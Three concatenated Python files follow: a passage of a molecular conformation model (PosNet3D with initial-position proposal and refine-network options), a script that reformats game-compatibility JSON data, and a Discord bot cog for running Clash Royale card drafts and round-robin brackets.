raise NotImplementedError(f'n ref samples {n_ref_samples} and n gen samples {n_gen_samples} mismatch')
elif propose_net_type == 'rdkit' or propose_net_type == 'online_rdkit':
# initialized the model input with the rdkit pos if the generation is successful
if n_gen_samples == 1: # [n_nodes, n_samples, 3]
init_pos = batch.ndata['rdkit_pos'] + utils.noise_like(batch.ndata['rdkit_pos'], noise_type, noise)
else:
# tile batch when n_gen_sample > 1
# init_pos = batch.ndata['rdkit_pos'].permute(1, 0, 2).reshape(-1, 3)
# init_pos += utils.noise_like(init_pos, noise_type, noise)
init_pos = []
sample_idx = 0
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = graph.ndata['rdkit_pos'][:, sample_idx % n_gen_samples] + utils.noise_like(
graph.ndata['rdkit_pos'][:, sample_idx % n_gen_samples], noise_type, noise)
sample_idx += 1
init_pos.append(pos)
init_pos = torch.cat(init_pos, dim=0).to(labels)
elif propose_net_type == 'random':
# initialized the model input with the random pos
init_pos = []
for n_nodes in batch.batch_num_nodes().tolist():
init_pos.append(torch.randn(n_nodes, 3) * (1 + n_nodes * noise))
init_pos = torch.cat(init_pos, dim=0).to(labels)
elif propose_net_type == 'gt':
# initialized the model with ground truth + noise, but eval with the rdkit init
if n_ref_samples == n_gen_samples:
init_pos = labels + utils.noise_like(labels, noise_type, noise, labels_slices)
elif n_gen_samples == 1 and n_ref_samples > 1:
all_init_pos = []
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
rand_idx = random.randint(0, len(label) - 1)
init_pos = label[rand_idx] + utils.noise_like(label[rand_idx], noise_type, noise)
all_init_pos.append(init_pos)
init_pos = torch.cat(all_init_pos)
else:
raise ValueError('No need to make n_gen_samples > 1 when n_ref_samples = 1 and propose net is gt')
else:
raise ValueError(propose_net_type)
return init_pos
def get_refine_net(refine_net_type, config):
# baseline
if refine_net_type == 'equi_se3trans':
refine_net = EquiSE3Transformer(
num_layers=config.num_layers,
atom_feature_size=config.hidden_dim,
num_channels=config.num_channels,
num_nlayers=config.num_nlayers,
num_degrees=config.num_degrees,
edge_dim=config.hidden_dim,
div=config.div,
n_heads=config.n_heads
)
elif refine_net_type == 'egnn':
refine_net = EnEquiNetwork(
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
update_x=True,
act_fn=config.act_fn,
norm=config.norm
)
# our model
elif refine_net_type == 'ours_o2':
refine_net = UniTransformerO2TwoUpdateGeneral(
num_blocks=config.num_blocks,
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
n_heads=config.n_heads,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
num_node_types=config.num_node_types,
act_fn=config.act_fn,
norm=config.norm,
cutoff_mode=config.cutoff_mode,
ew_net_type=config.ew_net_type,
r_feat_mode=config.r_feat_mode,
energy_h_mode=config.energy_h_mode,
num_x2h=config.num_x2h,
num_h2x=config.num_h2x,
r_max=config.r_max,
x2h_out_fc=config.x2h_out_fc,
sync_twoup=config.sync_twoup
)
# our model
elif refine_net_type == 'ours_o3':
refine_net = UniTransformerO3TwoUpdateGeneral(
num_blocks=config.num_blocks,
num_layers=config.num_layers,
hidden_dim=config.hidden_dim,
n_heads=config.n_heads,
edge_feat_dim=config.hidden_dim,
num_r_gaussian=config.num_r_gaussian,
num_node_types=config.num_node_types,
act_fn=config.act_fn,
norm=config.norm,
cutoff_mode=config.cutoff_mode,
ew_net_type=config.ew_net_type,
r_feat_mode=config.r_feat_mode,
energy_h_mode=config.energy_h_mode,
num_x2h=config.num_x2h,
num_h2x=config.num_h2x,
num_init_x2h=config.num_init_x2h,
num_init_h2x=config.num_init_h2x,
r_max=config.r_max,
x2h_out_fc=config.x2h_out_fc,
sync_twoup=config.sync_twoup
)
else:
raise ValueError(refine_net_type)
return refine_net
class PosNet3D(nn.Module):
def __init__(self, config, node_type_dim=100, edge_type_dim=len(BOND_TYPES)):
super(PosNet3D, self).__init__()
self.refine_net_type = config.model_type
self.hidden_dim = config.hidden_dim
self.node_type_dim = node_type_dim
self.edge_type_dim = edge_type_dim
self.node_feat_dim = self.node_type_dim + len(NODE_FEATS)
self.edge_feat_dim = self.edge_type_dim + 1 # edge_conj_feat
if 'our' in self.refine_net_type and 'mix' in config.energy_h_mode:
self.node_emb = nn.Linear(self.node_feat_dim, self.hidden_dim * 2, bias=False)
else:
self.node_emb = nn.Linear(self.node_feat_dim, self.hidden_dim, bias=False)
self.edge_emb = nn.Linear(self.edge_feat_dim, self.hidden_dim, bias=False)
self.refine_net = get_refine_net(self.refine_net_type, config)
def forward(self, G, init_pos):
edge_index = torch.stack(G.edges()).to(G.ndata['node_type'].device)
node_feat = torch.cat([F.one_hot(G.ndata['node_type'], self.node_type_dim).to(G.ndata['node_feat']),
G.ndata['node_feat']], dim=-1)
node_attr = self.node_emb(node_feat)
edge_feat = torch.cat([F.one_hot(G.edata['edge_type'], self.edge_type_dim).to(G.ndata['node_feat']),
G.edata['edge_feat']], dim=-1)
edge_attr = self.edge_emb(edge_feat)
# refine coordinates with SE(3)-equivariant network
G.ndata['x'] = init_pos
src, dst = edge_index
G.edata['d'] = init_pos[dst] - init_pos[src]
G.ndata['f'] = node_attr.unsqueeze(-1)
G.edata['w'] = edge_attr
final_pos, all_pos = self.refine_net(G)
return final_pos, all_pos
def get_gen_pos(self, propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type='const',
n_ref_samples=1, n_gen_samples=1, labels_slices=None, zero_mass_center=False,
eval_mode=False, fix_init_pos=None):
if fix_init_pos is not None:
init_pos = fix_init_pos
else:
if eval_mode:
assert propose_net_type != 'gt'
if n_gen_samples == 1:
init_pos = get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type,
n_ref_samples, n_gen_samples, labels_slices, eval_mode=eval_mode)
else:
tile_batch = []
for idx, graph in enumerate(dgl.unbatch(batch)):
for _ in range(n_gen_samples):
tile_batch.append(graph)
batch = dgl.batch(tile_batch)
init_pos = get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio, noise_type,
n_ref_samples, n_gen_samples, labels_slices, eval_mode=eval_mode)
if zero_mass_center:
# make the init_pos zero mass center
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
standard_init_pos = []
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = init_pos[n_slices[idx]:n_slices[idx + 1]]
pos = pos - pos.mean(0)
standard_init_pos.append(pos)
init_pos = torch.cat(standard_init_pos, dim=0)
gen_pos, all_pos = self(batch, init_pos)
return init_pos, gen_pos, all_pos
|
import json
import datetime
import re
with open('./data.json') as f:
data = json.load(f)
data = data['data']
new_data = []
for entry in data:
title = entry[0]
serial = "{}-{}".format(re.split(r'(\d+)', entry[1])[0], re.split(r'(\d+)', entry[1])[1])
region = entry[2]
if "compatusa" in region:
region = "us"
elif "compatjapan" in region:
region = "ja"
elif "compateurope" in region:
region = "eu"
elif "compatkorea" in region:
region = "kr"
elif "compatchina" in region:
region = "ch"
elif "compatfrance" in region:
region = "fr"
elif "compatgermany" in region:
region = "de"
else:
print(region)
status = entry[3].split("<")[0]
last_tested_version = entry[4]
crc = entry[5]
last_tested_date = datetime.datetime.strptime(entry[6], '%d-%m-%Y') # m-d=y? lets change to ISO timestamps y-m-d
if "Not available" in entry[7]:
wiki_link = None
else:
wiki_link = entry[7].split("href=")[1].split(">")[0]
if "Not available" in entry[8]:
forum_link = None
else:
forum_link = entry[8].split('href=\"')[1].split('\"')[0]
new_data.append({
'title': title,
'serial': serial,
'crc': crc,
'region': region,
'status': status,
'last_tested_version': last_tested_version,
'last_tested_date': last_tested_date.isoformat(),
'wiki_link': wiki_link,
'forum_link': forum_link
})
with open('./data-new.json', 'w') as json_file:
json.dump(new_data, json_file, indent=2)
with open('./data-new.min.json', 'w') as json_file:
json.dump(new_data, json_file)
|
import discord
from discord.ext import commands
import sys
sys.path.append("../")
import os
import pickle
import asyncio
import re
import requests
import json
import collections
from random import*
from pathlib import Path
from .utils.draft import Draft
from .utils.player import Player
from .utils.dataIO import dataIO, fileIO
#from ext.enterdraftresults import manageLeaderboard
prefix = ["!"]
autodeletetime = 30
async def getRank(player):
with open("leaderboard.p", "rb") as f:
l = pickle.load(f)
for i in range(len(l)):
if l[i][0] == player.display_name:
return i+1
async def getEmoji(bot, name):
return discord.utils.get(bot.get_all_emojis(), name=re.sub("[^a-zA-Z]", "", name))
async def updateDrafterRole(server, player):
classicRole = discord.utils.get(server.roles, name="Classic Drafter")
rareRole = discord.utils.get(server.roles, name="Rare Drafter")
epicRole = discord.utils.get(server.roles, name="Epic Drafter")
legendaryRole = discord.utils.get(server.roles, name="Legendary Drafter")
user = server.get_member(player.id)
roles = user.roles
if classicRole in roles:
roles.remove(classicRole)
if rareRole in roles:
roles.remove(rareRole)
if epicRole in roles:
roles.remove(epicRole)
if legendaryRole in roles:
roles.remove(legendaryRole)
if player.draft_amount > player.old_draft_amount:
da = player.draft_amount
else:
da = player.old_draft_amount
if da <= 4:
roles.append(classicRole)
elif da >= 5 and da <= 9:
roles.append(rareRole)
elif da >= 10 and da <= 19:
roles.append(epicRole)
elif da >= 20:
roles.append(legendaryRole)
return roles
class Drafting():
"""Commands used for drafting"""
def __init__(self, bot):
self.bot = bot
self.opendrafts = []
self.cards = sorted(dataIO.load_json('data/drafting/cards.json'), key=lambda card: card["name"])
@commands.command(pass_context=True)
async def createdraft(self, ctx, *, optionalarguments=""):
"""creates a draft to join
Only usuable in the "monthly_mayhem"!
Open Drafts will be pinned to the channel to keep track of them.
Players can enter by reacting with the star emoji(clicking on it).
Cancel the creation of the draft with the octagonal sign
optional arguments(seperate with commas):
'size= ' (leaving this out creates a standard 8 man draft)
'name= ' (leaving this out calles the Draft '<creator>'s Draft')
'eligible= ' (needs to name of a role, leaving this out makes it eligible for everyone and tags @Drafter)
'tag' (if you mention this the bot will add @tag in the creation message. Per default it tags @Drafter but if you change who's eligible it will tag this role instead!)
'starttime= ' (The approximate starttime of the draft, you can leave this out)
Example: '!createdraft size=4, tag, name=My fancy draft, starttime=2 am in the evening, eligible=V.I.P Drafter' creates a draft called 'My fancy draft' with the size 4 only for V.I.P Drafters aswell as tagging them in the message and mentioning the startingtime
"""
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
draftlobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
if ctx.message.channel != draftlobby:
await self.bot.say("This command should only be used in 'monthly_mayhem' so we can keep everything in one place 😉", delete_after=autodeletetime)
return
host = ctx.message.author
if not Path("data/drafting/playerData/"+host.id+".p").is_file():
await self.bot.say(host.mention+", you are not registered yet. Please do so with "+prefix[0]+"register if you want to participate in Monthly Mayhem", delete_after=autodeletetime)
return
if "size=" in optionalarguments:
size = int(optionalarguments.partition("size=")[2].partition(",")[0])
else:
size = 8
if size < 2:
if not marshalRole in host.roles and not modRole in host.roles:
await self.bot.say("You are not allowed to create drafts with a size smaller than 2.", delete_after=autodeletetime)
return
if "name=" in optionalarguments:
name = optionalarguments.partition("name=")[2].partition(",")[0]
optionalarguments = optionalarguments.replace(name, "")
else:
name = host.display_name+"'s Draft"
if "eligible=" in optionalarguments:
eligible = optionalarguments.partition("eligible=")[2].partition(",")[0]
optionalarguments = optionalarguments.replace(eligible, "")
eligiblerole = discord.utils.get(ctx.message.server.roles, name=eligible)
if eligiblerole == None:
await self.bot.say("Error, creating Draft failed. Invalid eligible statement(needs to be role name)", delete_after=autodeletetime)
return
else:
eligiblerole = ctx.message.server.default_role
if "tag" in optionalarguments:
tag = "True"
else:
tag = "False"
if eligiblerole == ctx.message.server.default_role:
drafterrole = discord.utils.get(ctx.message.server.roles, name="MM participant")
if tag == "False":
mention = ""
else:
mention = drafterrole.mention
else:
if tag == "False":
mention = ""
else:
mention = eligiblerole.mention
draftobj = Draft(size=size, eligible=eligiblerole.id, name=name, host=host.id)
print("## Draft '"+draftobj.name+"' has been created by "+host.display_name)
self.opendrafts.append(draftobj.id)
participants = []
self.men = True # If names are displayed as mentions
async def upPartis():
partinames = ""
if self.men == True:
for p in participants:
partinames = partinames +" "+ p.mention
else:
for p in participants:
partinames = partinames +" "+ p.display_name + ","
if partinames == "":
partinames = "-"
return partinames
emb = discord.Embed(title="New "+str(draftobj.size)+" man Draft '"+draftobj.name+"'", description="Draft is in creation", color=0x3498db)
emb.add_field(name="Host", value=host.mention)
emb.add_field(name="Draftname", value=draftobj.name)
emb.add_field(name="Size", value=str(size))
emb.add_field(name="DraftID", value=draftobj.id)
emb.add_field(name="Eligible", value=eligiblerole.name)
if "starttime=" in optionalarguments:
emb.add_field(name="Starting Time", value=optionalarguments.partition("starttime=")[2].partition(",")[0])
emb.add_field(name="Current Participants ("+str(len(participants))+")", value=await upPartis(), inline=False)
emb.set_footer(text="Use star to join the draft. Numbers to adjust draftsize. Octagonal sign to cancel creation. Notepad to toggle mentions.")
msg = await self.bot.say(mention, embed=emb)
await self.bot.pin_message(msg)
async for message in self.bot.logs_from(msg.channel, limit=5, after=msg):
if message.type.pins_add:
await self.bot.delete_message(message)
async def toggleMentions():
if self.men == True:
self.men = False
emb.set_field_at(0, name="Host", value=host.display_name)
else:
self.men = True
emb.set_field_at(0, name="Host", value=host.mention)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
buttons = ["⭐", "🔢", "🛑", "🗒"] # star, numpad, stop, notepad
for b in buttons:
await self.bot.add_reaction(msg, b)
async def handleReaction(react):
if react.user != self.bot.user:
if not react.reaction.emoji in buttons:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
else:
if Path("data/drafting/playerData/"+react.user.id+".p").is_file():
if react.reaction.emoji == "🛑":
if react.user == host or modRole in react.user.roles:
await self.bot.delete_message(msg)
self.opendrafts.remove(draftobj.id)
await self.bot.say(react.user.mention +" canceled the creation of the draft '"+draftobj.name+"'")
print("## Draft '"+draftobj.name+"' has been canceled")
return True
else:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
elif react.reaction.emoji == "🗒":
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
await toggleMentions()
elif react.reaction.emoji == "⭐":
if eligiblerole in react.user.roles:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
if react.user in participants:
participants.remove(react.user)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
else:
participants.append(react.user)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
else:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
elif react.reaction.emoji == "🔢":
if react.user != host:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
else:
await self.bot.clear_reactions(msg)
emojis = ["◀"] # back emoji
for m in range(2,10):
emoji = str(m)+"\u20e3"
emojis.append(emoji)
for e in emojis:
await self.bot.add_reaction(msg, e)
numbers = {"1\u20e3":1, "2\u20e3":2, "3\u20e3":3, "4\u20e3":4, "5\u20e3":5, "6\u20e3":6, "7\u20e3":7, "8\u20e3":8, "9\u20e3":9}
while True:
n = await self.bot.wait_for_reaction(message=msg, timeout=15)
if n == None:
break
if n.user != self.bot.user:
if n.reaction.emoji in emojis:
if n.reaction.emoji == "◀": # back
break
num = numbers[n.reaction.emoji]
draftobj.size = num
break
else:
await self.bot.remove_reaction(msg, n.reaction.emoji, n.user)
emb.set_field_at(2, name="Size", value=str(draftobj.size))
emb.title = "New "+str(draftobj.size)+" man Draft '"+draftobj.name+"'"
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(msg)
for b in buttons:
await self.bot.add_reaction(msg, b)
else:
await self.bot.say(react.user.mention+", you are not registered yet. Please do so with **"+prefix[0]+"register** if you want to participate in Monthly Mayhem", delete_after=autodeletetime)
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
while True:
r = await self.bot.wait_for_reaction(message=msg, timeout=10800)
if r == None:
await self.bot.delete_message(msg)
self.opendrafts.remove(draftobj.id)
await self.bot.say(draftobj.name +" timed out")
print("## "+draftobj.name +" timed out")
return
d = await handleReaction(r)
if d == True:
break
if r.user != self.bot.user:
if len(participants) == draftobj.size:
self.opendrafts.remove(draftobj.id)
await self.bot.clear_reactions(msg)
draftobj.status = "full"
fullPlayersMsg = "The draft '"+draftobj.name+"'("+draftobj.id+") is filled up! \nThe players are: "
for p in participants:
draftobj.players.append(p.id)
fullPlayersMsg = fullPlayersMsg + p.mention +", "
fullPlayersMsg = fullPlayersMsg + "\nThe host is: " + host.mention
fullPlayersMsg = fullPlayersMsg +"\nDo you want to start the draft?(Host only)"
fullPlayersMsg = await self.bot.say(fullPlayersMsg)
await self.bot.add_reaction(fullPlayersMsg, "❎")#no
await self.bot.add_reaction(fullPlayersMsg, "✅")#yes
while True:
react = await self.bot.wait_for_reaction(message=fullPlayersMsg)
if react.user != self.bot.user:
if react.user == host or modRole in react.user.roles or marshalRole in react.user.roles:
if react.reaction.emoji == "✅": # yes
await self.bot.delete_message(msg)
draftobj.status = "running"
await self.bot.clear_reactions(fullPlayersMsg)
await self.bot.edit_message(fullPlayersMsg, fullPlayersMsg.content+"\n*The draft has been started!*")
playerRole = await self.bot.create_role(ctx.message.server, name=draftobj.name, hoist=False, permissions=discord.Permissions.none(), mentionable=True)
draftobj.playerRole = playerRole.id
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
roles = plr.roles
roles.append(playerRole)
await self.bot.replace_roles(plr, *roles)
everyonePerms = discord.PermissionOverwrite(read_messages=False)
playerPerms = discord.PermissionOverwrite(read_messages=True)
channelname = re.sub("[^a-zA-Z0-9-_]", "", draftobj.name.replace(" ","_"))
channel = await self.bot.create_channel(ctx.message.server, channelname, (ctx.message.server.default_role, everyonePerms),(playerRole, playerPerms),(marshalRole, playerPerms),(modRole, playerPerms))
await self.bot.edit_channel(channel, topic=draftobj.id)
draftobj.channel = channel.id
await self.bot.say(host.mention+" started the draft '"+draftobj.name+"'("+draftobj.id+"). Happy drafting! \n"+playerRole.mention+" please use the specific textchannel "+channel.mention+" for setting the draft up(Use **!startdraft** there if you want to do an in-discord draft and **!createbracket** for a bracket) \nUse **'"+prefix[0]+"finishdraft <draftid> <draftpage>'** once you are finished or **'"+prefix[0]+"canceldraft <draftid>'** to cancel it.")
await self.bot.whisper("DraftID of your Draft '"+draftobj.name+"':")
await self.bot.whisper(draftobj.id)
with open("data/drafting/drafts/"+draftobj.id+".p", "wb") as f:
pickle.dump(draftobj, f)
print("## Draft '"+draftobj.name+"' is now running")
return True
elif react.reaction.emoji == "❎": # no
await self.bot.delete_message(fullPlayersMsg)
self.opendrafts.append(draftobj.id)
for b in buttons:
await self.bot.add_reaction(msg, b)
break
else:
await self.bot.remove_reaction(fullPlayersMsg, react.reaction.emoji, react.user)
else:
await self.bot.remove_reaction(fullPlayersMsg, react.reaction.emoji, react.user)
async def poolMsg(self, pool, title="", n=13):
cn = 0
cm = 0
line = ""
msgs = []
for i in range(int(len(self.cards)/(n*2)) + (len(self.cards)%(n*2) > 0)):
msgs.append('\u2063')
title = "**"+title+"**\n"
for c in pool:
e = await getEmoji(self.bot, c["name"])
line = line + str(e)
cn += 1
cm += 1
if cn == n:
cn = 0
line = line + " \n"
if cm == n*2:
cm = 0
for i in range(len(msgs)):
if not len(msgs[i]) > 2:
if line != "":
msgs[i] = line
line = ""
for i in range(len(msgs)):
if not len(msgs[i]) > 2:
if line != "":
msgs[i] = line
break
msgs = [title]+msgs+['\u2063']
return msgs
async def getCard(self, name):
card = None
for c in self.cards:
if re.sub("[^a-zA-Z]", "", c["name"]) == name:
card = c
break
return card
@commands.command(pass_context=True)
async def startdraft(self, ctx, timer=30):
"""used for starting in-discord drafts
Do not mistake this with !createdraft
You can only run this in the respective channel of a draft(created by using !createdraft)
Pick cards by using the reactions.
The timer for each pick can be adjusted by adding a number in seconds. Standard is 30s. Minimum is 10
While the draft is running you will not be able to talk in the channel
"""
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You can only use this command in a group channel", delete_after=autodeletetime)
raise
return
channel = ctx.message.server.get_channel(draftobj.channel)
if ctx.message.channel != channel:
await self.bot.say("You can only use this command in the group channel", delete_after=autodeletetime)
return
if draftobj.status != "running":
await self.bot.say("This draft is not running", delete_after=autodeletetime)
return
if ctx.message.author.id != draftobj.host:
await self.bot.say("Only the host is able to start the draft", delete_after=autodeletetime)
return
perm = discord.PermissionOverwrite()
perm.read_messages = True
perm.send_messages = False
perm.add_reactions = False
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.edit_channel_permissions(channel, playerRole, perm)
print("## Draft '"+draftobj.name+"' discord-draft has been started")
players = []
player_decks = {}
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
players.append(plr)
player_decks[plr.id] = []
shuffle(players)
if timer < 5:
timer = 5
tips = ["Did you know you can use Ctrl+F to check if a card is already drafted?", "Use the reactions below to pick your cards!", "In the last ten seconds of a turn this message will turn yellow to alarm you!", "Did you know that there are only 22 units that can attack air?", "Spells are really valuable! But you can still win without any!", "You can't chat in here during the drafting process: Less distraction, more drafting!", "Green means GO! Red means NO!", "Autopicks won't pick legendaries!"]
emb = discord.Embed(title=draftobj.name, description="Each player picks one card after another in snakedraft format("+str(timer)+"s time)", color=discord.Colour.red())
emb.set_footer(text=tips[randint(0,len(tips)-1)])
emb.add_field(name="Status", value="initializing...", inline=False)
for p in players:
emb.add_field(name=p.display_name, value="\u2063", inline=False)
pool = self.cards[:]
drafted = []
d = await self.poolMsg(drafted, "Drafted cards:")
mainMsg = await self.bot.say(embed=emb)
dMsgs = []
for i in d:
m = await self.bot.say(i)
dMsgs.append(m)
emojis = []
for i in pool:
e = await getEmoji(self.bot, i["name"])
emojis.append(e)
m1 = await self.bot.say("\u2063**A B C D E**")
for e in emojis[:20]:
await self.bot.add_reaction(m1, e)
m1 = await self.bot.get_message(ctx.message.channel, m1.id)
m2 = await self.bot.say("\u2063**F G H I **")
for e in emojis[20:40]:
await self.bot.add_reaction(m2, e)
m2 = await self.bot.get_message(ctx.message.channel, m2.id)
m3 = await self.bot.say("\u2063**K L M N P R**")
for e in emojis[40:60]:
await self.bot.add_reaction(m3, e)
m3 = await self.bot.get_message(ctx.message.channel, m3.id)
m4 = await self.bot.say("\u2063**S T V W X Z**")
for e in emojis[60:]:
await self.bot.add_reaction(m4, e)
m4 = await self.bot.get_message(ctx.message.channel, m4.id)
#perm.add_reactions = True
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.edit_channel_permissions(channel, playerRole, perm)
def check(reaction, user):
return reaction.message.channel == channel and reaction.emoji in emojis
for i in range(8):
_round = "("+str(i+1)+"/8)"
for j in range(draftobj.size):
if i%2 != 0:
j = draftobj.size-1-j
turn = players[j]
emb.color = discord.Colour.green()
emb.set_field_at(0, name="Status", value="**"+turn.display_name+"**'s turn to pick "+_round, inline=False)
await self.bot.edit_message(mainMsg, embed=emb)
r = await self.bot.wait_for_reaction(user=turn, check=check, timeout=timer-10)
if r == None:
emb.color = discord.Colour.gold()
await self.bot.edit_message(mainMsg, embed=emb)
r = await self.bot.wait_for_reaction(user=turn, check=check, timeout=10)
emb.set_field_at(0, name="Status", value="processing pick...", inline=False)
emb.color = discord.Colour.red()
await self.bot.edit_message(mainMsg, embed=emb)
if r == None:
card = pool[randint(0,len(pool)-1)]
while card["rarity"] == "Legendary":
card = pool[randint(0,len(pool)-1)]
emoji = await getEmoji(self.bot, card["name"])
for m in [m1,m2,m3,m4]:
msg = discord.utils.find(lambda n: n.emoji == emoji, m.reactions)
if msg != None:
msg = msg.message
r = discord.utils.get(msg.reactions, emoji=emoji)
break
else:
card = await self.getCard(r.reaction.emoji.name)
emoji = r.reaction.emoji
r = r.reaction
members = await self.bot.get_reaction_users(r)
for u in members:
await self.bot.remove_reaction(r.message, r.emoji, u)
pool.remove(card)
drafted.append(card)
d = await self.poolMsg(drafted, "Drafted cards:")
for m in range(len(dMsgs)):
await self.bot.edit_message(dMsgs[m], d[m])
player_decks[turn.id].append(card["id"])
emb.set_field_at(j+1, name=turn.display_name, value=emb.fields[j+1].value+str(emoji), inline=False)
await self.bot.edit_message(mainMsg, embed=emb)
emb.set_field_at(0, name="Status", value="over", inline=False)
emb.color = discord.Colour.default()
await self.bot.edit_message(mainMsg, embed=emb)
dic = emb.to_dict()
draftobj.decks = dic["fields"][1:]
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.delete_messages([m1,m2,m3,m4])
await self.bot.say("**DECK LINKS**")
for p in players:
await self.bot.say(p.display_name + ": https://link.clashroyale.com/deck/en?deck={}".format(";".join([str(i) for i in player_decks[turn.id]])))
perm = discord.PermissionOverwrite()
perm.read_messages = True
perm.send_messages = True
await self.bot.edit_channel_permissions(channel, playerRole, perm)
@commands.command(pass_context=True)
async def createbracket(self, ctx):
"""creates a round robin bracket for the draft
Can only be used by the host of the draft in the draftchannel!
The results of the bracket will be entered into the draftfile.
If you want the results to be processed and trophies adjusted you need a Marshal or mod to either finish your draft or use !processresults
"""
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You can only use this command in a group channel", delete_after=autodeletetime)
raise
return
channel = ctx.message.server.get_channel(draftobj.channel)
if ctx.message.channel != channel:
await self.bot.say("You can only use this command in the group channel", delete_after=autodeletetime)
return
if draftobj.status != "running":
await self.bot.say("This draft is not running", delete_after=autodeletetime)
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id != draftobj.host and not modRole in ctx.message.author.roles and not marshalRole in ctx.message.author.roles:
await self.bot.say("Only the host is able to create the bracket", delete_after=autodeletetime)
return
draftobj.status = "bracket"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
players = []
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
players.append(plr)
'''players = [] # for testing on testserver
for m in ctx.message.server.members:
players.append(m)
draftobj.size = len(players)-1'''
if len(players) % 2:
UserName = collections.namedtuple("UserName", "display_name")
players.append(UserName(display_name="None"))
rotation = players[:]
fixtures = []
for i in range(0, len(players)-1):
fixtures.append(rotation)
rotation = [rotation[0]] + [rotation[-1]] + rotation[1:-1]
bracket = []
for f in fixtures:
n = len(f)
bracket.append(list(zip(f[0:n//2],reversed(f[n//2:n]))))
results = {}
resEmb = discord.Embed(title="Results", description="Results of the individual players(W/L)", color=discord.Colour.teal())
resEmb.set_footer(text="Use the tick to finish the bracket once all results are entered. The octagonal cancels this bracket.")
for p in players:
if p.display_name != "None":
results[p.display_name] = [0,0]
resEmb.add_field(name=p.display_name, value="0/0", inline=False)
messages = []
for r in range(len(bracket)):
emb = discord.Embed(title="Round "+str(r+1), description="Use the notepad to enter the results of this round")
for m in range(len(bracket[r])):
p1 = bracket[r][m][0].display_name
p2 = bracket[r][m][1].display_name
emb.add_field(name="Match "+str(m+1) ,value="**"+p1+"**\n vs\n**"+p2+"**")
msg = await self.bot.say(embed=emb)
await self.bot.add_reaction(msg, "📝")
messages.append(msg.id)
res = await self.bot.say(embed=resEmb)
messages.append(res.id)
await self.bot.add_reaction(res, "🛑")
await self.bot.add_reaction(res, "☑")
print("## Created Bracket for '"+draftobj.name+"'("+draftobj.id+")")
def check(reaction, user):
if modRole in user.roles or marshalRole in user.roles or user.id == draftobj.host:
return reaction.message.id in messages and reaction.emoji in ["📝", "🛑", "☑", "✅"]
else:
return False
emojis = []
def checkEmoji(reaction, user):
return reaction.emoji in emojis and (modRole in user.roles or marshalRole in user.roles or user.id == draftobj.host)
host = ctx.message.server.get_member(draftobj.host)
numbers = {"1\u20e3":1, "2\u20e3":2, "3\u20e3":3, "4\u20e3":4, "5\u20e3":5, "6\u20e3":6, "7\u20e3":7, "8\u20e3":8, "9\u20e3":9}
complete = False
while True:
r = await self.bot.wait_for_reaction(check=check)
msg = r.reaction.message
if r.reaction.emoji == "🛑":
for m in messages:
msg = await self.bot.get_message(channel, m)
await self.bot.clear_reactions(msg)
resEmb.color = discord.Colour.red()
await self.bot.edit_message(res, embed=resEmb)
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
draftobj.status = "running"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.say("The Bracket has been canceled")
print("## The bracket of "+draftobj.name+" has been canceled")
break
elif r.reaction.emoji == "☑":
await self.bot.remove_reaction(msg, "☑", r.user)
await self.bot.say("The bracket is not completed yet, please enter the missing results", delete_after=5)
elif r.reaction.emoji =="✅":
if complete == False:
await self.bot.remove_reaction(msg, "✅", r.user)
await self.bot.say("The bracket is not completed yet, please enter the missing results", delete_after=5)
else:
for m in messages:
msg = await self.bot.get_message(channel, m)
await self.bot.clear_reactions(msg)
resEmb.color = discord.Colour.green()
await self.bot.edit_message(res, embed=resEmb)
